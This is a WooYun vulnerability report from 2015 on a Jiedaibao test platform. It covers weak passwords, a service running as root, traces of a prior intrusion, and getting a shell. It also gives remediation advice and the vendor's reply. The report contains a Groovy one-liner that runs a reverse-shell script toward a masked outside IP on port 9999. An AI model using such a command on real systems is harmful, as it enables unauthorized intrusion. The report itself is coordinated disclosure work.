当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148094

漏洞标题:借贷宝自动化测试平台未授权访问getshell可入其他公司内网

相关厂商:借贷宝

漏洞作者: 403

提交时间:2015-10-20 17:04

修复时间:2015-12-04 18:34

公开时间:2015-12-04 18:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

最近借贷宝推广很热啊,扫二维码注册认证就送小米充电宝,今天顺便来看看安全做得怎么样。

详细说明:

自动化测试平台:plist.jiedaibao.com:8080
1、未授权访问&弱口令
遍历用户弱口令,发现几个弱口令账户,登录:

敏感文件打包下载.png


2、启动权限太高(root权限)
执行命令查看当前用户权限,发现居然是root权限:

启动账号.png


3、已被入侵
本想新建账号登录,可惜远程登录使用了public key,那就试试反弹连接,发现居然已经有人来过了。

已被入侵.png


反弹连接地址.png


4、getshell
既然已经有了back.py,那就省的自己写入了,直接反弹连接:
println "python /tmp/back.py xxx.xxx.xxx.xxx 9999".execute().text 本地监听9999端口

反弹连接成功.png


5、浏览内网
发现一个其他网站的页面,这个比较奇怪,怎么跟其他公司内网相通呢?求解答

与其他公司内网网段想通.png


其他公司页面.png


漏洞证明:

如上

修复方案:

自动化测试平台禁止暴露在外网,或者限制访问IP
修改弱口令账户
启动权限不要使用ROOT权限
另外,这个平台还允许任意用户注册,一起修复一下吧

版权声明:转载请注明来源 403@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-20 18:32

厂商回复:

感谢对我们的关注,问题已修复。
该平台为一台独立服务器,并不在我们内网,影响范围较小。

最新状态:

暂无